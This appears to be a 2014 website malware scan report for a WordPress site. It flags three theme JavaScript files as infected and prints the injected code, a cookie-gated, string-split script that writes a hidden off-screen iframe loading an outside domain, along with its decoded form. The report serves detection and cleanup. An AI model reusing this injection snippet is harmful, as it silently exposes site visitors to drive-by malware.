Scanned pages/files
| Request | Server response | Status |
http://iosmachine.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Jun 2014 20:21:03 GMT Location: http://www.iosmachine.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.iosmachine.com/xmlrpc.php | clean |
http://www.iosmachine.com/ | 200 OK Content-Length: 51097 Content-Type: text/html | clean |
http://dtym7iokkjlif.cloudfront.net/media/js/jquery.shareaholic-publishers-sb.min.js?ver=6.1.5.1 | 200 OK Content-Length: 49666 Content-Type: application/javascript | clean |
http://dtym7iokkjlif.cloudfront.net/media/js/jquery.shareaholic-publishers-rd.min.js?ver=6.1.5.1 | 200 OK Content-Length: 440 Content-Type: application/javascript | clean |
http://www.iosmachine.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: text/javascript | clean |
http://www.iosmachine.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.iosmachine.com/wp-content/themes/themorningafter/includes/js/superfish.js?ver=3.8.3 | 200 OK Content-Length: 6205 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: hewaber.gerontology-medical.es ...[1238 bytes skipped]... (name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://hewaber.gerontology-medical.es/ytkiull.cgi?15" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMe ...[3827 bytes skipped]... Decoded script: <iframe src="http://hewaber.gerontology-medical.es/ytkiull.cgi?15" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://www.iosmachine.com/wp-content/themes/themorningafter/includes/js/woo_tabs.js?ver=3.8.3 | 200 OK Content-Length: 3376 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: hewaber.gerontology-medical.es ...[1238 bytes skipped]... (name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://hewaber.gerontology-medical.es/ytkiull.cgi?15" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); jQuery(document).ready(function(){ var tag_cloud_class = '#tagcloud'; var tag_cloud_height = jQuery('#tagcloud').height(); jQuery('.inside ul li:last-child').css('border-bottom','0px'); jQuery('.wooTabs').each(function(){ jQu ...[639 bytes skipped]... Decoded script: <iframe src="http://hewaber.gerontology-medical.es/ytkiull.cgi?15" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://www.iosmachine.com/wp-content/themes/themorningafter/includes/js/general.js?ver=3.8.3 | 200 OK Content-Length: 2295 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: hewaber.gerontology-medical.es ...[1238 bytes skipped]... (name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://hewaber.gerontology-medical.es/ytkiull.cgi?15" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); ; ; Decoded script: <iframe src="http://hewaber.gerontology-medical.es/ytkiull.cgi?15" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19916 Content-Type: text/javascript | clean |
http://iosmachine.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 02 Jun 2014 20:21:11 GMT Pragma: no-cache Location: http://www.iosmachine.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.iosmachine.com/xmlrpc.php | clean |
http://www.iosmachine.com/test404page.js | 404 Not Found Content-Length: 22129 Content-Type: text/html | clean |
http://www.iosmachine.com/online-privacy-policy/ | 200 OK Content-Length: 24500 Content-Type: text/html | clean |
http://www.iosmachine.com/wp-includes/js/comment-reply.min.js?ver=3.8.3 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://www.iosmachine.com/skype/ | 200 OK Content-Length: 30846 Content-Type: text/html | clean |
http://www.iosmachine.com/author/admin/ | 200 OK Content-Length: 42944 Content-Type: text/html | clean |
http://www.iosmachine.com/postcard/ | 200 OK Content-Length: 31364 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iosmachine.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Jun 2014 20:21:03 GMT
Location: http://www.iosmachine.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iosmachine.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: iosmachine.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Jun 2014 20:21:03 GMT
Location: http://www.iosmachine.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iosmachine.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iosmachine.com
Referer: http://www.google.com/search?q=iosmachine.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iosmachine.com
Referer: http://www.google.com/search?q=iosmachine.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iosmachine.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iosmachine.com/
Result: iosmachine.com is not infected or malware details are not published yet.
Result: iosmachine.com is not infected or malware details are not published yet.